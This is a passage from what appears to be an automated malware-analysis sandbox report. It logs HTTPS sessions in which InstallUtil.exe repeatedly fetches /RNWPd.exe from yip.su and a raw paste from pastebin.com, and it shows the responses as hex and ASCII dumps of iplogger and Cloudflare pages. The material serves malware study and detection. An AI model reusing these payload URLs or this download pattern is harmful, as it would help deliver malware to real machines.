                            2024-09-10 16:21:40 UTC529INData Raw: 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 7d 29 29 7d 76
                            Data Ascii: etElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}v
                            2024-09-10 16:21:40 UTC5INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            16192.168.2.1149728188.114.97.34437848C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                            TimestampBytes transferredDirectionData
                            2024-09-10 16:21:41 UTC65OUTGET /RNWPd.exe HTTP/1.1
                            Host: yip.su
                            Connection: Keep-Alive
                            2024-09-10 16:21:41 UTC904INHTTP/1.1 200 OK
                            Date: Tue, 10 Sep 2024 16:21:41 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: close
                            memory: 0.36197662353515625
                            expires: Tue, 10 Sep 2024 16:21:41 +0000
                            strict-transport-security: max-age=604800
                            strict-transport-security: max-age=31536000
                            content-security-policy: img-src https: data:; upgrade-insecure-requests
                            x-frame-options: SAMEORIGIN
                            Cache-Control: max-age=14400
                            CF-Cache-Status: EXPIRED
                            Last-Modified: Tue, 10 Sep 2024 16:21:41 GMT
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BqDhZgqb2%2BtvIYkkg%2BxugJQg%2BLBPE2JvHpVJKlTC7XeSwyDEK4Gpu%2BBwRUw2XhG4dJP3pmOluXyioYHsQor0TPqYIEbONButJ%2FPBIQySJfy34vCbHekDqUE%3D"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 8c10c0a63a6ac472-EWR
                            alt-svc: h3=":443"; ma=86400
                            2024-09-10 16:21:41 UTC465INData Raw: 31 64 32 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 22 20 63 6c 61 73 73 3d 22 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c
                            Data Ascii: 1d26<!DOCTYPE html><html lang="" class="html"><head><title></title><meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width,
                            2024-09-10 16:21:41 UTC1369INData Raw: 74 2d 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 37 20 64 61 79 73 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 73 68 6f 72 74 65 6e 65 72 2c 20 69 70 6c 6f 67 67 65 72 2c 20 73 68 6f 72 74 6c 69 6e 6b 2c 20 75 72 6c 2c 20 64 6f 6d 61 69 6e 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 69 70 6c 6f 67 67 65 72 2e 6f 72 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 0a 09 3c 6d 65 74 61 20 70 72 6f
                            Data Ascii: t-after" content="7 days" /><meta name="keywords" content="shortener, iplogger, shortlink, url, domain" /><meta name="description" content="" /><link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" /><meta pro
                            2024-09-10 16:21:41 UTC1369INData Raw: 75 6e 64 2d 63 6f 6c 6f 72 3a 23 33 33 38 62 64 39 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 3a 32 35 70 78 20 35 70 78 20 30 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 32 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 33 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65
                            Data Ascii: und-color:#338bd9;display:inline-block;margin:25px 5px 0;-webkit-animation:jump 1s linear infinite;animation:jump 1s linear infinite}#loader>span:nth-child(2){-webkit-animation-delay:0.2s;animation-delay:0.2s}#loader>span:nth-child(3){-webkit-animation-de
                            2024-09-10 16:21:41 UTC1369INData Raw: 2e 75 73 65 72 41 67 65 6e 74 44 61 74 61 2e 70 6c 61 74 66 6f 72 6d 3d 3d 3d 27 57 69 6e 64 6f 77 73 27 29 7b 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 44 61 74 61 2e 67 65 74 48 69 67 68 45 6e 74 72 6f 70 79 56 61 6c 75 65 73 28 5b 27 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 27 5d 29 2e 74 68 65 6e 28 75 61 3d 3e 7b 5f 70 3d 70 61 72 73 65 49 6e 74 28 75 61 2e 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 2e 73 70 6c 69 74 28 27 2e 27 29 5b 30 5d 29 7d 29 7d 0a 09 76 61 72 20 5f 79 3d 5b 5d 2c 5f 7a 3d 7b 7d 2c 5f 78 3d 66 75 6e 63 74 69 6f 6e 28 6e 61 6d 65 2c 64 61 74 61 2c 6e 29 7b 69 66 28 74 79 70 65 6f 66 28 64 61 74 61 29 21 3d 3d 27 6f 62 6a 65 63 74 27 29 7b 64 61 74 61 3d 7b 7d 7d 3b 6e 3d 5f 79 2e 69 6e 64 65 78 4f 66 28 6e
                            Data Ascii: .userAgentData.platform==='Windows'){navigator.userAgentData.getHighEntropyValues(['platformVersion']).then(ua=>{_p=parseInt(ua.platformVersion.split('.')[0])})}var _y=[],_z={},_x=function(name,data,n){if(typeof(data)!=='object'){data={}};n=_y.indexOf(n
                            2024-09-10 16:21:41 UTC1369INData Raw: 3e 0a 0a 3c 73 74 79 6c 65 3e 0a 2e 77 72 61 70 70 65 72 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 30 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 7b 77 69 64 74 68 3a 34 34 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 33 32 30 70 78 3b 68 65 69 67 68 74 3a 33 35 30 70 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 6d 73 2d 66 6c 65 78 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6c 65 78 2d 77 72 61 70 3a 77 72 61 70 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 62 6f 72
                            Data Ascii: ><style>.wrapper{margin-top:100px}.container{width:440px;min-width:320px;height:350px;display:-ms-flexbox;display:flex;-ms-flex-align:center;align-items:center;-ms-flex-pack:center;justify-content:center;text-align:center;flex-wrap:wrap;margin:auto;bor
                            2024-09-10 16:21:41 UTC1369INData Raw: 33 31 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 7d 2e 6c 6f 67 6f 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 63 6f 6c 6f 72 3a 23 30 37 34 64 37 63 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 70 65 72 22 3e 0a 0a 20 20 20 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 09 3c 64 69 76 20
                            Data Ascii: 31px;margin:auto}.logo .logo-text{color:#074d7c;text-align:center;font-size:12px;white-space:nowrap;font-family:arial;font-weight:700}</style><div class="wrapper"> <div class="container"> <div class="header"><div class="domain"><div
                            2024-09-10 16:21:41 UTC160INData Raw: 2e 73 74 79 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 27 61 62 73 6f 6c 75 74 65 27 2c 61 2e 73 74 79 6c 65 2e 74 6f 70 3d 69 2c 61 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 69 2c 61 2e 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 75 6e 74 65 72 2e 79 61 64 72 6f 2e 72 75 2f 68 69 74 3f 27 2b 75 72 6c 2e 6a 6f 69 6e 28 27 3b 27 29 2c 64 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 3b 0a 09 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: .style.position='absolute',a.style.top=i,a.style.left=i,a.src='https://counter.yadro.ru/hit?'+url.join(';'),d.body.appendChild(a);</script></body></html>
                            2024-09-10 16:21:41 UTC5INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            17192.168.2.1149729104.20.3.2354437848C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                            TimestampBytes transferredDirectionData
                            2024-09-10 16:21:46 UTC74OUTGET /raw/V6VJsrV3 HTTP/1.1
                            Host: pastebin.com
                            Connection: Keep-Alive
                            2024-09-10 16:21:46 UTC222INHTTP/1.1 200 OK
                            Date: Tue, 10 Sep 2024 16:21:46 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: close
                            X-Frame-Options: SAMEORIGIN
                            Server: cloudflare
                            CF-RAY: 8c10c0c64dc7c3f3-EWR
                            2024-09-10 16:21:46 UTC1147INData Raw: 31 31 33 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                            Data Ascii: 1136<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                            2024-09-10 16:21:46 UTC1369INData Raw: 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d 77 72 61 70 70 65 72
                            Data Ascii: !--<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper
                            2024-09-10 16:21:46 UTC1369INData Raw: 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76
                            Data Ascii: re</a> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div
                            2024-09-10 16:21:46 UTC529INData Raw: 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 7d 29 29 7d 76
                            Data Ascii: etElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}v
                            2024-09-10 16:21:46 UTC5INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            18192.168.2.1149730188.114.97.34437848C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                            TimestampBytes transferredDirectionData
                            2024-09-10 16:21:47 UTC65OUTGET /RNWPd.exe HTTP/1.1
                            Host: yip.su
                            Connection: Keep-Alive
                            2024-09-10 16:21:47 UTC906INHTTP/1.1 200 OK
                            Date: Tue, 10 Sep 2024 16:21:47 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: close
                            memory: 0.36197662353515625
                            expires: Tue, 10 Sep 2024 16:21:47 +0000
                            strict-transport-security: max-age=604800
                            strict-transport-security: max-age=31536000
                            content-security-policy: img-src https: data:; upgrade-insecure-requests
                            x-frame-options: SAMEORIGIN
                            Cache-Control: max-age=14400
                            CF-Cache-Status: EXPIRED
                            Last-Modified: Tue, 10 Sep 2024 16:21:47 GMT
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3wmhZO%2FacQ4PIdvtUd%2BzpvlgO%2F9J4M3XG4KJO3h99F9o9l4ZazXg%2FTfOnhsLrvYY90CQvlT4hux8u0Rq4ZzbW%2BhE3wQ5aoKI4k%2FaD4bxTGQIpqxUsa0kt3E%3D"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 8c10c0cae9650f37-EWR
                            alt-svc: h3=":443"; ma=86400
                            2024-09-10 16:21:47 UTC463INData Raw: 31 64 32 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 22 20 63 6c 61 73 73 3d 22 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c
                            Data Ascii: 1d26<!DOCTYPE html><html lang="" class="html"><head><title></title><meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width,
                            2024-09-10 16:21:47 UTC1369INData Raw: 73 69 74 2d 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 37 20 64 61 79 73 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 73 68 6f 72 74 65 6e 65 72 2c 20 69 70 6c 6f 67 67 65 72 2c 20 73 68 6f 72 74 6c 69 6e 6b 2c 20 75 72 6c 2c 20 64 6f 6d 61 69 6e 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 69 70 6c 6f 67 67 65 72 2e 6f 72 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 0a 09 3c 6d 65 74 61 20 70
                            Data Ascii: sit-after" content="7 days" /><meta name="keywords" content="shortener, iplogger, shortlink, url, domain" /><meta name="description" content="" /><link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" /><meta p
                            2024-09-10 16:21:47 UTC1369INData Raw: 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 33 33 38 62 64 39 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 3a 32 35 70 78 20 35 70 78 20 30 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 32 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 33 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d
                            Data Ascii: round-color:#338bd9;display:inline-block;margin:25px 5px 0;-webkit-animation:jump 1s linear infinite;animation:jump 1s linear infinite}#loader>span:nth-child(2){-webkit-animation-delay:0.2s;animation-delay:0.2s}#loader>span:nth-child(3){-webkit-animation-
                            2024-09-10 16:21:47 UTC1369INData Raw: 6f 72 2e 75 73 65 72 41 67 65 6e 74 44 61 74 61 2e 70 6c 61 74 66 6f 72 6d 3d 3d 3d 27 57 69 6e 64 6f 77 73 27 29 7b 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 44 61 74 61 2e 67 65 74 48 69 67 68 45 6e 74 72 6f 70 79 56 61 6c 75 65 73 28 5b 27 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 27 5d 29 2e 74 68 65 6e 28 75 61 3d 3e 7b 5f 70 3d 70 61 72 73 65 49 6e 74 28 75 61 2e 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 2e 73 70 6c 69 74 28 27 2e 27 29 5b 30 5d 29 7d 29 7d 0a 09 76 61 72 20 5f 79 3d 5b 5d 2c 5f 7a 3d 7b 7d 2c 5f 78 3d 66 75 6e 63 74 69 6f 6e 28 6e 61 6d 65 2c 64 61 74 61 2c 6e 29 7b 69 66 28 74 79 70 65 6f 66 28 64 61 74 61 29 21 3d 3d 27 6f 62 6a 65 63 74 27 29 7b 64 61 74 61 3d 7b 7d 7d 3b 6e 3d 5f 79 2e 69 6e 64 65 78 4f 66
                            Data Ascii: or.userAgentData.platform==='Windows'){navigator.userAgentData.getHighEntropyValues(['platformVersion']).then(ua=>{_p=parseInt(ua.platformVersion.split('.')[0])})}var _y=[],_z={},_x=function(name,data,n){if(typeof(data)!=='object'){data={}};n=_y.indexOf
                            2024-09-10 16:21:47 UTC1369INData Raw: 70 74 3e 0a 0a 3c 73 74 79 6c 65 3e 0a 2e 77 72 61 70 70 65 72 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 30 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 7b 77 69 64 74 68 3a 34 34 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 33 32 30 70 78 3b 68 65 69 67 68 74 3a 33 35 30 70 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 6d 73 2d 66 6c 65 78 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6c 65 78 2d 77 72 61 70 3a 77 72 61 70 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 62
                            Data Ascii: pt><style>.wrapper{margin-top:100px}.container{width:440px;min-width:320px;height:350px;display:-ms-flexbox;display:flex;-ms-flex-align:center;align-items:center;-ms-flex-pack:center;justify-content:center;text-align:center;flex-wrap:wrap;margin:auto;b
